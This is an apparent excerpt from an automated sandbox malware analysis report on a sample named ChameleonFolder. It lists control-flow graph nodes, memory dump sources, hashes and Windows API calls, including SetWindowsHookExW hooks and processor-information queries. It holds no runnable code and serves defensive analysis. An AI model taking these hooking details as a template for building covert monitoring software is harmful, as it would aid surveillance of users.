                                                                                                                                        control_flow_graph 59 3499904-3499915 60 3499937-349993f 59->60 61 3499917-3499934 SetWindowsHookExW 59->61 62 3499941-3499961 SetWindowsHookExW 60->62 63 3499975-3499986 KiUserCallbackDispatcher 60->63 61->60 62->63 64 3499988-349998f 63->64 65 3499991-349999c 63->65 64->65 66 3499963-349996f 64->66 66->63
                                                                                                                                        APIs
                                                                                                                                        • SetWindowsHookExW.USER32(00000007,03499790,034A6C54,00000000), ref: 03499927
                                                                                                                                        • SetWindowsHookExW.USER32(00000005,0349988C,034A6C54,00000000), ref: 03499951
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0349997F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, Offset: 03411000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3411000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HookWindows$CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 59075224-0
                                                                                                                                        • Opcode ID: 685e130905317b8e8f6afe195771f31ed4ba061e5c57b91f5435b7954a9be54b
                                                                                                                                        • Instruction ID: 60105d89684bf7f5edddc2ba71d166735eb5175ea4c45a825bf341a25a05d8fe
                                                                                                                                        • Opcode Fuzzy Hash: 685e130905317b8e8f6afe195771f31ed4ba061e5c57b91f5435b7954a9be54b
                                                                                                                                        • Instruction Fuzzy Hash: 52110074A51608AFEB50EE68D885F5A7BEDAB09300F44415BA504EF3C4D774E940CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 314 58a22e-58a23e 316 58a279-58a27d 314->316 317 58a240-58a249 314->317 317->316 318 58a24b-58a265 call 589e78 317->318 320 58a26a 318->320 321 58a270-58a272 320->321 321->316
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 334 58a230-58a23e 335 58a279-58a27d 334->335 336 58a240-58a249 334->336 336->335 337 58a24b-58a26a call 589e78 336->337 340 58a270-58a272 337->340 340->335
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405E8B
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03405F08,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405EBF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationLogicalProcessor
                                                                                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                                                                                        • API String ID: 1773637529-812649623
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405E8B
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03405F08,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405EBF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationLogicalProcessor
                                                                                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                                                                                        • API String ID: 1773637529-812649623
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03409CE9
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03409D47
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03409DA4
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03409DD7
                                                                                                                                          • Part of subcall function 03409C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03409D55), ref: 03409CAB
                                                                                                                                          • Part of subcall function 03409C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03409D55), ref: 03409CC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2255706666-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%